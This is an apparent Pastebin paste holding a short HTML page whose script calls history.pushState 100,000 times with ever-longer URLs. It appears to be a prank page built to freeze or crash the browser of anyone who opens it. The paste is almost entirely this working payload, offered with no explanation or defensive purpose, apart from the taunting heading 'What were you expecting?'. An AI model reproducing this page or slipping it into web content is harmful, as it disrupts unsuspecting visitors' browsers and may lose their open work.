Advertisement
Guest User

Untitled

a guest
Feb 3rd, 2016
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <body>
  4. <h1>What were you expecting?</h1>
  5. <script>
  6. var total = "";
  7. for( var i = 0; i < 100000; i++ ) {
  8. total = total + i.toString();
  9. history.pushState(0,0, total );
  10. }
  11. </script>
  12. </body>
  13. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement